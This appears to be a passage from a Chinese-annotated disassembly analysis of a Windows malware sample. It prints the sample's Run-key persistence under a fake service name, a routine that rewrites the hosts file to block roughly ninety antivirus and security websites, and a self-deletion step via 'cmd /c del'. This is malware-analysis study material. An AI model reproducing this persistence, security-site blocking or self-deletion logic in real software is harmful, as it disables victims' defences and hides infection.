0040418A 6A 00 PUSH 0
0040418C 68 CAFEBB29 PUSH 29BBFECA
00404191 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
00404194 E8 4C060000 CALL misfotos.004047E5 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00404199 50 PUSH EAX ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040419A 68 02000080 PUSH 80000002
0040419F FF15 08804000 CALL DWORD PTR DS:[408008] ; ADVAPI32.RegCreateKeyExA(hKey = HKEY_LOCAL_MACHINE).
004041A5 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
004041A8 E8 08010000 CALL misfotos.004042B5 ; 清除内存数据.
004041AD 837D 08 00 CMP DWORD PTR SS:[EBP+8],0
004041B1 74 32 JE SHORT misfotos.004041E5
004041B3 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; String = "waccs.exe"
004041B6 FF15 D8804000 CALL DWORD PTR DS:[4080D8] ; kernel32.lstrlenA
004041BC 50 PUSH EAX
004041BD FF75 08 PUSH DWORD PTR SS:[EBP+8]
004041C0 6A 01 PUSH 1
004041C2 6A 00 PUSH 0
004041C4 68 4E9127A1 PUSH A127914E
004041C9 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041CC E8 74060000 CALL misfotos.00404845 ; ASCII "Windows Activation Control Center Service"
004041D1 50 PUSH EAX ; ASCII "Windows Activation Control Center Service"
004041D2 FF75 FC PUSH DWORD PTR SS:[EBP-4]
004041D5 FF15 04804000 CALL DWORD PTR DS:[408004] ; ADVAPI32.RegSetValueExA
004041DB 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041DE E8 FA000000 CALL misfotos.004042DD ; 清除内存数据.
004041E3 EB 25 JMP SHORT misfotos.0040420A
004041E5 68 7A9127A1 PUSH A127917A
004041EA 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
004041F0 E8 50060000 CALL misfotos.00404845 ; 清除内存数据.
004041F5 50 PUSH EAX
004041F6 FF75 FC PUSH DWORD PTR SS:[EBP-4]
004041F9 FF15 00804000 CALL DWORD PTR DS:[408000] ; ADVAPI32.RegDeleteValueA
004041FF 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
00404205 E8 D3000000 CALL misfotos.004042DD ; 清除内存数据.
0040420A FF75 FC PUSH DWORD PTR SS:[EBP-4]
0040420D FF15 18804000 CALL DWORD PTR DS:[408018] ; ADVAPI32.RegCloseKey
00404213 C9 LEAVE
00404214 C3 RETN ; 返回.
在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站:
00403370 55 PUSH EBP
00403371 8BEC MOV EBP,ESP
00403373 81EC E0030000 SUB ESP,3E0
00403379 68 04010000 PUSH 104
0040337E 6A 00 PUSH 0
00403380 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
00403386 50 PUSH EAX
00403387 E8 AE3C0000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
0040338C 83C4 0C ADD ESP,0C
0040338F 68 04010000 PUSH 104
00403394 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
0040339A 50 PUSH EAX
0040339B FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
004033A1 68 04010000 PUSH 104
004033A6 68 E6430183 PUSH 830143E6
004033AB 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033B1 E8 4F0F0000 CALL misfotos.00404305 ; ASCII "\drivers\etc\hosts"
004033B6 50 PUSH EAX ; ASCII "\drivers\etc\hosts"
004033B7 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033BD 50 PUSH EAX ; ASCII "C:\WINDOWS\system32"
004033BE E8 6B3C0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat(ASCII "C:\WINDOWS\system32\drivers\etc\hosts").
004033C3 83C4 0C ADD ESP,0C
004033C6 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033CC E8 C5EAFFFF CALL misfotos.00401E96 ; 清除内存数据.
004033D1 68 38924000 PUSH misfotos.00409238 ; /mode = "w"
004033D6 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033DC 50 PUSH EAX ; |path = "C:\WINDOWS\system32\drivers\etc\hosts"
004033DD E8 D83C0000 CALL misfotos.004070BA ; JMP 到 msvcrt.fopen(打开HOSTS域名映像劫持文件)
004033E2 59 POP ECX
004033E3 59 POP ECX
004033E4 8985 B8FDFFFF MOV DWORD PTR SS:[EBP-248],EAX
004033EA 83BD B8FDFFFF 0>CMP DWORD PTR SS:[EBP-248],0
004033F1 75 07 JNZ SHORT misfotos.004033FA
004033F3 32C0 XOR AL,AL
004033F5 E9 18060000 JMP misfotos.00403A12
004033FA 68 AF305D14 PUSH 145D30AF
004033FF 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
00403405 E8 5B0F0000 CALL misfotos.00404365 ; ASCII "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340A 50 PUSH EAX ; /format = "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340B FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
00403411 E8 9E3C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
00403416 59 POP ECX
00403417 59 POP ECX
00403418 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
0040341E E8 F20D0000 CALL misfotos.00404215 ; 清除内存数据.
00403423 68 981A4325 PUSH 25431A98
00403428 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
0040342E E8 920F0000 CALL misfotos.004043C5 ; ASCII "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#
"
00403433 50 PUSH EAX ; /format = "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#
"
00403434 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
0040343A E8 753C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
0040343F 59 POP ECX
00403440 59 POP ECX
00403441 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
00403447 E8 F10D0000 CALL misfotos.0040423D ; 清除内存数据.
0040344C C785 C0FDFFFF B>MOV DWORD PTR SS:[EBP-240],misfotos.0040>; merijn.org
00403456 C785 C4FDFFFF C>MOV DWORD PTR SS:[EBP-23C],misfotos.0040>; www.merijn.org
00403460 C785 C8FDFFFF D>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; www.spywareinfo.comspywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
0040346A C785 CCFDFFFF E>MOV DWORD PTR SS:[EBP-234],misfotos.0040>; spywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
00403474 C785 D0FDFFFF F>MOV DWORD PTR SS:[EBP-230],misfotos.0040>; www.spybot.infospybot.infowww.viruslist.com
0040347E C785 D4FDFFFF 0>MOV DWORD PTR SS:[EBP-22C],misfotos.0040>; spybot.infowww.viruslist.com
00403488 C785 D8FDFFFF 1>MOV DWORD PTR SS:[EBP-228],misfotos.0040>; www.viruslist.com
00403492 C785 DCFDFFFF 2>MOV DWORD PTR SS:[EBP-224],misfotos.0040>; viruslist.com
0040349C C785 E0FDFFFF 3>MOV DWORD PTR SS:[EBP-220],misfotos.0040>; www.hijackthis.de
004034A6 C785 E4FDFFFF 5>MOV DWORD PTR SS:[EBP-21C],misfotos.0040>; hijackthis.de
004034B0 C785 E8FDFFFF 6>MOV DWORD PTR SS:[EBP-218],misfotos.0040>; www.majorgeeks.com
004034BA C785 ECFDFFFF 7>MOV DWORD PTR SS:[EBP-214],misfotos.0040>; majorgeeks.com
004034C4 C785 F0FDFFFF 8>MOV DWORD PTR SS:[EBP-210],misfotos.0040>; www.virustotal.com
004034CE C785 F4FDFFFF 9>MOV DWORD PTR SS:[EBP-20C],misfotos.0040>; virustotal.com
004034D8 C785 F8FDFFFF A>MOV DWORD PTR SS:[EBP-208],misfotos.0040>; kaspersky.com
004034E2 C785 FCFDFFFF B>MOV DWORD PTR SS:[EBP-204],misfotos.0040>; kaspersky-labs.com
004034EC C785 00FEFFFF C>MOV DWORD PTR SS:[EBP-200],misfotos.0040>; www.kaspersky.com
004034F6 C785 04FEFFFF E>MOV DWORD PTR SS:[EBP-1FC],misfotos.0040>; www.sophos.com
00403500 C785 08FEFFFF F>MOV DWORD PTR SS:[EBP-1F8],misfotos.0040>; sophos
0040350A C785 0CFEFFFF F>MOV DWORD PTR SS:[EBP-1F4],misfotos.0040>; securityresponse.symantec.com
00403514 C785 10FEFFFF 1>MOV DWORD PTR SS:[EBP-1F0],misfotos.0040>; symantec.com
0040351E C785 14FEFFFF 2>MOV DWORD PTR SS:[EBP-1EC],misfotos.0040>; www.symantec.com
00403528 C785 18FEFFFF 3>MOV DWORD PTR SS:[EBP-1E8],misfotos.0040>; updates.symantec.com
00403532 C785 1CFEFFFF 5>MOV DWORD PTR SS:[EBP-1E4],misfotos.0040>; liveupdate.symantecliveupdate.com
0040353C C785 20FEFFFF 7>MOV DWORD PTR SS:[EBP-1E0],misfotos.0040>; liveupdate.symantec.comcustomer.symantec.com
00403546 C785 24FEFFFF 9>MOV DWORD PTR SS:[EBP-1DC],misfotos.0040>; customer.symantec.com
00403550 C785 28FEFFFF A>MOV DWORD PTR SS:[EBP-1D8],misfotos.0040>; update.symantec.comwww.mcafee.com
0040355A C785 2CFEFFFF B>MOV DWORD PTR SS:[EBP-1D4],misfotos.0040>; www.mcafee.com
00403564 C785 30FEFFFF C>MOV DWORD PTR SS:[EBP-1D0],misfotos.0040>; mcafee.com
0040356E C785 34FEFFFF D>MOV DWORD PTR SS:[EBP-1CC],misfotos.0040>; rads.mcafee.commast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403578 C785 38FEFFFF E>MOV DWORD PTR SS:[EBP-1C8],misfotos.0040>; mast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403582 C785 3CFEFFFF F>MOV DWORD PTR SS:[EBP-1C4],misfotos.0040>; download.mcafee.comdispatch.mcafee.comus.mcafee.com
0040358C C785 40FEFFFF 0>MOV DWORD PTR SS:[EBP-1C0],misfotos.0040>; dispatch.mcafee.comus.mcafee.com
00403596 C785 44FEFFFF 2>MOV DWORD PTR SS:[EBP-1BC],misfotos.0040>; us.mcafee.com
004035A0 C785 48FEFFFF 3>MOV DWORD PTR SS:[EBP-1B8],misfotos.0040>; www.trendsecure.comtrendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035AA C785 4CFEFFFF 4>MOV DWORD PTR SS:[EBP-1B4],misfotos.0040>; trendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035B4 C785 50FEFFFF 5>MOV DWORD PTR SS:[EBP-1B0],misfotos.0040>; www.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035BE C785 54FEFFFF 6>MOV DWORD PTR SS:[EBP-1AC],misfotos.0040>; avp.comanalysis.seclab.tuwien.ac.at
004035C8 C785 58FEFFFF 6>MOV DWORD PTR SS:[EBP-1A8],misfotos.0040>; analysis.seclab.tuwien.ac.at
004035D2 C785 5CFEFFFF 8>MOV DWORD PTR SS:[EBP-1A4],misfotos.0040>; www.bleepingcomputer.com
004035DC C785 60FEFFFF A>MOV DWORD PTR SS:[EBP-1A0],misfotos.0040>; bleepingcomputer.com
004035E6 C785 64FEFFFF B>MOV DWORD PTR SS:[EBP-19C],misfotos.0040>; guru0.grisoft.cz
004035F0 C785 68FEFFFF D>MOV DWORD PTR SS:[EBP-198],misfotos.0040>; guru1.grisoft.cz
004035FA C785 6CFEFFFF E>MOV DWORD PTR SS:[EBP-194],misfotos.0040>; guru2.grisoft.cz
00403604 C785 70FEFFFF F>MOV DWORD PTR SS:[EBP-190],misfotos.0040>; guru3.grisoft.cz
0040360E C785 74FEFFFF 0>MOV DWORD PTR SS:[EBP-18C],misfotos.0040>; guru4.grisoft.cz
00403618 C785 78FEFFFF 2>MOV DWORD PTR SS:[EBP-188],misfotos.0040>; guru5.grisoft.cz
00403622 C785 7CFEFFFF 3>MOV DWORD PTR SS:[EBP-184],misfotos.0040>; download.f-secure.com
0040362C C785 80FEFFFF 4>MOV DWORD PTR SS:[EBP-180],misfotos.0040>; www.download.f-secure.com
00403636 C785 84FEFFFF 6>MOV DWORD PTR SS:[EBP-17C],misfotos.0040>; avg-antivirus.net
00403640 C785 88FEFFFF 7>MOV DWORD PTR SS:[EBP-178],misfotos.0040>; www.avg-antivirus.net
0040364A C785 8CFEFFFF 9>MOV DWORD PTR SS:[EBP-174],misfotos.0040>; f-secure.com
00403654 C785 90FEFFFF A>MOV DWORD PTR SS:[EBP-170],misfotos.0040>; www.f-secure.com
0040365E C785 94FEFFFF B>MOV DWORD PTR SS:[EBP-16C],misfotos.0040>; free.grisoft.com
00403668 C785 98FEFFFF C>MOV DWORD PTR SS:[EBP-168],misfotos.0040>; www.free.grisoft.com
00403672 C785 9CFEFFFF E>MOV DWORD PTR SS:[EBP-164],misfotos.0040>; free.avg.com
0040367C C785 A0FEFFFF F>MOV DWORD PTR SS:[EBP-160],misfotos.0040>; www.free.avg.com
00403686 C785 A4FEFFFF 0>MOV DWORD PTR SS:[EBP-15C],misfotos.0040>; avast.com
00403690 C785 A8FEFFFF 1>MOV DWORD PTR SS:[EBP-158],misfotos.0040>; www.avast.com
0040369A C785 ACFEFFFF 2>MOV DWORD PTR SS:[EBP-154],misfotos.0040>; onlinescan.avast.com
004036A4 C785 B0FEFFFF 3>MOV DWORD PTR SS:[EBP-150],misfotos.0040>; www.onlinescan.avast.com
004036AE C785 B4FEFFFF 5>MOV DWORD PTR SS:[EBP-14C],misfotos.0040>; housecall.trendmicro.com
004036B8 C785 B8FEFFFF 7>MOV DWORD PTR SS:[EBP-148],misfotos.0040>; www.housecall.trendmicro.com
004036C2 C785 BCFEFFFF 9>MOV DWORD PTR SS:[EBP-144],misfotos.0040>; free.avg.com
004036CC C785 C0FEFFFF A>MOV DWORD PTR SS:[EBP-140],misfotos.0040>; www.free.avg.com
004036D6 C785 C4FEFFFF B>MOV DWORD PTR SS:[EBP-13C],misfotos.0040>; bitdefender.comwww.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036E0 C785 C8FEFFFF C>MOV DWORD PTR SS:[EBP-138],misfotos.0040>; www.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036EA C785 CCFEFFFF D>MOV DWORD PTR SS:[EBP-134],misfotos.0040>; trendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036F4 C785 D0FEFFFF E>MOV DWORD PTR SS:[EBP-130],misfotos.0040>; www.trendsecure.comfuturenow.bitdefender.com
004036FE C785 D4FEFFFF 0>MOV DWORD PTR SS:[EBP-12C],misfotos.0040>; futurenow.bitdefender.com
00403708 C785 D8FEFFFF 1>MOV DWORD PTR SS:[EBP-128],misfotos.0040>; www.futurenow.bitdefender.com
00403712 C785 DCFEFFFF 3>MOV DWORD PTR SS:[EBP-124],misfotos.0040>; f-prot.com
0040371C C785 E0FEFFFF 4>MOV DWORD PTR SS:[EBP-120],misfotos.0040>; www.f-prot.com
00403726 C785 E4FEFFFF 5>MOV DWORD PTR SS:[EBP-11C],misfotos.0040>; eset.com
00403730 C785 E8FEFFFF 6>MOV DWORD PTR SS:[EBP-118],misfotos.0040>; www.eset.com
0040373A C785 ECFEFFFF 7>MOV DWORD PTR SS:[EBP-114],misfotos.0040>; free-av.comwww.free-av.comavira.com
00403744 C785 F0FEFFFF 8>MOV DWORD PTR SS:[EBP-110],misfotos.0040>; www.free-av.comavira.com
0040374E C785 F4FEFFFF 9>MOV DWORD PTR SS:[EBP-10C],misfotos.0040>; avira.com
00403758 C785 F8FEFFFF 9>MOV DWORD PTR SS:[EBP-108],misfotos.0040>; www.avira.com
00403762 C785 FCFEFFFF A>MOV DWORD PTR SS:[EBP-104],misfotos.0040>; free.avg.com
0040376C C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],misfotos.0040>; www.free.avg.com
00403776 C785 04FFFFFF D>MOV DWORD PTR SS:[EBP-FC],misfotos.00409>; antivir.es
00403780 C785 08FFFFFF D>MOV DWORD PTR SS:[EBP-F8],misfotos.00409>; www.antivir.es
0040378A C785 0CFFFFFF E>MOV DWORD PTR SS:[EBP-F4],misfotos.00409>; ikarus.net
00403794 C785 10FFFFFF F>MOV DWORD PTR SS:[EBP-F0],misfotos.00409>; www.ikarus.net
0040379E C785 14FFFFFF 0>MOV DWORD PTR SS:[EBP-EC],misfotos.00409>; prevx.com
004037A8 C785 18FFFFFF 1>MOV DWORD PTR SS:[EBP-E8],misfotos.00409>; www.prevx.com
004037B2 C785 1CFFFFFF 2>MOV DWORD PTR SS:[EBP-E4],misfotos.00409>; 2-spyware.com
004037BC C785 20FFFFFF 3>MOV DWORD PTR SS:[EBP-E0],misfotos.00409>; www.2-spyware.com
004037C6 C785 24FFFFFF 4>MOV DWORD PTR SS:[EBP-DC],misfotos.00409>; castlecops.com
004037D0 C785 28FFFFFF 5>MOV DWORD PTR SS:[EBP-D8],misfotos.00409>; www.castlecops.com
004037DA C785 2CFFFFFF 6>MOV DWORD PTR SS:[EBP-D4],misfotos.00409>; virusinfo.prevx.comwww.virusinfo.prevx.comforums.majorgeeks.com
004037E4 C785 30FFFFFF 8>MOV DWORD PTR SS:[EBP-D0],misfotos.00409>; www.virusinfo.prevx.comforums.majorgeeks.com
004037EE C785 34FFFFFF 9>MOV DWORD PTR SS:[EBP-CC],misfotos.00409>; forums.majorgeeks.com
004037F8 C785 38FFFFFF B>MOV DWORD PTR SS:[EBP-C8],misfotos.00409>; www.forums.majorgeeks.com
00403802 C785 3CFFFFFF C>MOV DWORD PTR SS:[EBP-C4],misfotos.00409>; eradicatespyware.net
0040380C C785 40FFFFFF E>MOV DWORD PTR SS:[EBP-C0],misfotos.00409>; www.eradicatespyware.net
00403816 C785 44FFFFFF 0>MOV DWORD PTR SS:[EBP-BC],misfotos.00409>; fortinet.com
00403820 C785 48FFFFFF 1>MOV DWORD PTR SS:[EBP-B8],misfotos.00409>; www.fortinet.com
0040382A C785 4CFFFFFF 2>MOV DWORD PTR SS:[EBP-B4],misfotos.00409>; fortiguardcenter.com
00403834 C785 50FFFFFF 3>MOV DWORD PTR SS:[EBP-B0],misfotos.00409>; www.fortiguardcenter.com
0040383E C785 54FFFFFF 5>MOV DWORD PTR SS:[EBP-AC],misfotos.00409>; trendmicro.com
00403848 C785 58FFFFFF 6>MOV DWORD PTR SS:[EBP-A8],misfotos.00409>; www.trendmicro.com
00403852 C785 5CFFFFFF 7>MOV DWORD PTR SS:[EBP-A4],misfotos.00409>; www.safer-networking.org
0040385C C785 60FFFFFF 9>MOV DWORD PTR SS:[EBP-A0],misfotos.00409>; safer-networking.org
00403866 C785 64FFFFFF B>MOV DWORD PTR SS:[EBP-9C],misfotos.00409>; auditmypc.com
00403870 C785 68FFFFFF C>MOV DWORD PTR SS:[EBP-98],misfotos.00409>; www.auditmypc.com
0040387A C785 6CFFFFFF D>MOV DWORD PTR SS:[EBP-94],misfotos.00409>; pctools.comwww.pctools.comfirewallguide.com
00403884 C785 70FFFFFF E>MOV DWORD PTR SS:[EBP-90],misfotos.00409>; www.pctools.comfirewallguide.com
0040388E C785 74FFFFFF F>MOV DWORD PTR SS:[EBP-8C],misfotos.00409>; firewallguide.com
00403898 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],misfotos.00409>; www.firewallguide.com
004038A2 C785 7CFFFFFF 1>MOV DWORD PTR SS:[EBP-84],misfotos.00409>; spywaredb.com
004038AC C745 80 2C9B400>MOV DWORD PTR SS:[EBP-80],misfotos.00409>; www.spywaredb.com
004038B3 C745 84 409B400>MOV DWORD PTR SS:[EBP-7C],misfotos.00409>; virusspy.com
004038BA C745 88 509B400>MOV DWORD PTR SS:[EBP-78],misfotos.00409>; www.virusspy.com
004038C1 C745 8C 649B400>MOV DWORD PTR SS:[EBP-74],misfotos.00409>; eradicatespyware.net
004038C8 C745 90 7C9B400>MOV DWORD PTR SS:[EBP-70],misfotos.00409>; www.eradicatespyware.net
004038CF C745 94 989B400>MOV DWORD PTR SS:[EBP-6C],misfotos.00409>; spywareterminator.com
004038D6 C745 98 B09B400>MOV DWORD PTR SS:[EBP-68],misfotos.00409>; www.spywareterminator.com
004038DD C745 9C CC9B400>MOV DWORD PTR SS:[EBP-64],misfotos.00409>; freespywareremoval.infowww.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038E4 C745 A0 E49B400>MOV DWORD PTR SS:[EBP-60],misfotos.00409>; www.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038EB C745 A4 009C400>MOV DWORD PTR SS:[EBP-5C],misfotos.00409>; antivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038F2 C745 A8 149C400>MOV DWORD PTR SS:[EBP-58],misfotos.00409>; www.antivirus.about.comantivirus.comodo.com
004038F9 C745 AC 2C9C400>MOV DWORD PTR SS:[EBP-54],misfotos.00409>; antivirus.comodo.com
00403900 C745 B0 449C400>MOV DWORD PTR SS:[EBP-50],misfotos.00409>; www.antivirus.comodo.com
00403907 C745 B4 609C400>MOV DWORD PTR SS:[EBP-4C],misfotos.00409>; clamav.net
0040390E C745 B8 6C9C400>MOV DWORD PTR SS:[EBP-48],misfotos.00409>; www.clamav.net
00403915 C745 BC 7C9C400>MOV DWORD PTR SS:[EBP-44],misfotos.00409>; pandasecurity.com
0040391C C745 C0 909C400>MOV DWORD PTR SS:[EBP-40],misfotos.00409>; www.pandasecurity.com
00403923 C745 C4 A89C400>MOV DWORD PTR SS:[EBP-3C],misfotos.00409>; clamwin.comwww.clamwin.comshop.symantecstore.com
0040392A C745 C8 B49C400>MOV DWORD PTR SS:[EBP-38],misfotos.00409>; www.clamwin.comshop.symantecstore.com
00403931 C745 CC C49C400>MOV DWORD PTR SS:[EBP-34],misfotos.00409>; shop.symantecstore.com
00403938 C745 D0 DC9C400>MOV DWORD PTR SS:[EBP-30],misfotos.00409>; www.shop.symantecstore.com
0040393F C745 D4 F89C400>MOV DWORD PTR SS:[EBP-2C],misfotos.00409>; shop.ca.comwww.shop.ca.comca.com
00403946 C745 D8 049D400>MOV DWORD PTR SS:[EBP-28],misfotos.00409>; www.shop.ca.comca.com
0040394D C745 DC 149D400>MOV DWORD PTR SS:[EBP-24],misfotos.00409>; ca.com
00403954 C745 E0 1C9D400>MOV DWORD PTR SS:[EBP-20],misfotos.00409>; www.ca.com
0040395B C745 E4 289D400>MOV DWORD PTR SS:[EBP-1C],misfotos.00409>; networkworld.com
00403962 C745 E8 3C9D400>MOV DWORD PTR SS:[EBP-18],misfotos.00409>; www.networkworld.com
00403969 C745 EC 549D400>MOV DWORD PTR SS:[EBP-14],misfotos.00409>; norman.com
00403970 C745 F0 609D400>MOV DWORD PTR SS:[EBP-10],misfotos.00409>; www.norman.com
00403977 C745 F4 709D400>MOV DWORD PTR SS:[EBP-C],misfotos.00409D>; grisoft.comwww.grisoft.com\n
0040397E C745 F8 7C9D400>MOV DWORD PTR SS:[EBP-8],misfotos.00409D>; www.grisoft.com\n
00403985 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00403989 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
00403990 EB 0D JMP SHORT misfotos.0040399F
00403992 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
00403998 40 INC EAX
00403999 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
0040399F 83BD BCFDFFFF 5>CMP DWORD PTR SS:[EBP-244],5A
004039A6 7D 14 JGE SHORT misfotos.004039BC
004039A8 68 8C9D4000 PUSH misfotos.00409D8C ; \n
004039AD FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039B3 E8 FC360000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
004039B8 59 POP ECX
004039B9 59 POP ECX
004039BA ^ EB D6 JMP SHORT misfotos.00403992 ; 循环插入"\n".
004039BC 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
004039C3 EB 0D JMP SHORT misfotos.004039D2
004039C5 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039CB 40 INC EAX
004039CC 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
004039D2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039D8 83BC85 C0FDFFFF>CMP DWORD PTR SS:[EBP+EAX*4-240],0
004039E0 74 22 JE SHORT misfotos.00403A04
004039E2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039E8 FFB485 C0FDFFFF PUSH DWORD PTR SS:[EBP+EAX*4-240]
004039EF 68 909D4000 PUSH misfotos.00409D90 ; 127.0.0.1\t%s\n
004039F4 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039FA E8 B5360000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
004039FF 83C4 0C ADD ESP,0C
00403A02 ^ EB C1 JMP SHORT misfotos.004039C5 ; 循环插入"127.0.0.1\t%s\n".
00403A04 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
00403A0A E8 9F360000 CALL misfotos.004070AE ; JMP 到 msvcrt.fclose(关闭HOSTS域名映像劫持文件)
00403A0F 59 POP ECX
00403A10 B0 01 MOV AL,1
00403A12 C9 LEAVE
00403A13 C3 RETN ; 返回.
安装程序关闭退出,并执行自我删除操作:
0040400D 55 PUSH EBP
0040400E 8BEC MOV EBP,ESP
00404010 81EC 48030000 SUB ESP,348
00404016 68 04010000 PUSH 104
0040401B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404021 50 PUSH EAX
00404022 6A 00 PUSH 0
00404024 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
0040402A 50 PUSH EAX
0040402B FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00404031 68 04010000 PUSH 104
00404036 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040403C 50 PUSH EAX
0040403D 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404043 50 PUSH EAX
00404044 FF15 D4804000 CALL DWORD PTR DS:[4080D4] ; kernel32.GetShortPathNameA(将Windows中的长文件名转换为DOS下的短文件名).
0040404A 68 04010000 PUSH 104
0040404F 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
00404055 50 PUSH EAX
00404056 68 389E4000 PUSH misfotos.00409E38 ; comspec/c del > nul
0040405B FF15 D0804000 CALL DWORD PTR DS:[4080D0] ; kernel32.GetEnvironmentVariableA
00404061 6A 04 PUSH 4
00404063 6A 00 PUSH 0
00404065 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040406B 50 PUSH EAX ; "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
0040406C FF15 CC804000 CALL DWORD PTR DS:[4080CC] ; kernel32.MoveFileExA
00404072 68 04010000 PUSH 104
00404077 68 409E4000 PUSH misfotos.00409E40 ; /c del > nul
0040407C 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
00404082 50 PUSH EAX
00404083 E8 14300000 CALL misfotos.0040709C ; JMP 到 msvcrt.strncpy
00404088 83C4 0C ADD ESP,0C
0040408B 68 04010000 PUSH 104 ; /maxlen = 104 (260.)
00404090 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404096 50 PUSH EAX ; |src = "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
00404097 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
0040409D 50 PUSH EAX ; |dest = "/c del "
0040409E E8 8B2F0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat
004040A3 83C4 0C ADD ESP,0C
004040A6 68 04010000 PUSH 104 /maxlen = 104 (260.)
004040AB 68 489E4000 PUSH misfotos.00409E48 ; |src = " > nul"
004040B0 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040B6 50 PUSH EAX ; |dest = "/c del C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
004040B7 E8 722F0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat
004040BC 83C4 0C ADD ESP,0C
004040BF C785 BCFDFFFF 3>MOV DWORD PTR SS:[EBP-244],3C
004040C9 83A5 C4FDFFFF 0>AND DWORD PTR SS:[EBP-23C],0
004040D0 C785 C8FDFFFF 5>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; open
004040DA 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
004040E0 8985 CCFDFFFF MOV DWORD PTR SS:[EBP-234],EAX
004040E6 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040EC 8985 D0FDFFFF MOV DWORD PTR SS:[EBP-230],EAX
004040F2 83A5 D4FDFFFF 0>AND DWORD PTR SS:[EBP-22C],0
004040F9 83A5 D8FDFFFF 0>AND DWORD PTR SS:[EBP-228],0
00404100 C785 C0FDFFFF 4>MOV DWORD PTR SS:[EBP-240],40
0040410A 68 00010000 PUSH 100
0040410F FF15 C8804000 CALL DWORD PTR DS:[4080C8] ; kernel32.GetCurrentProcess
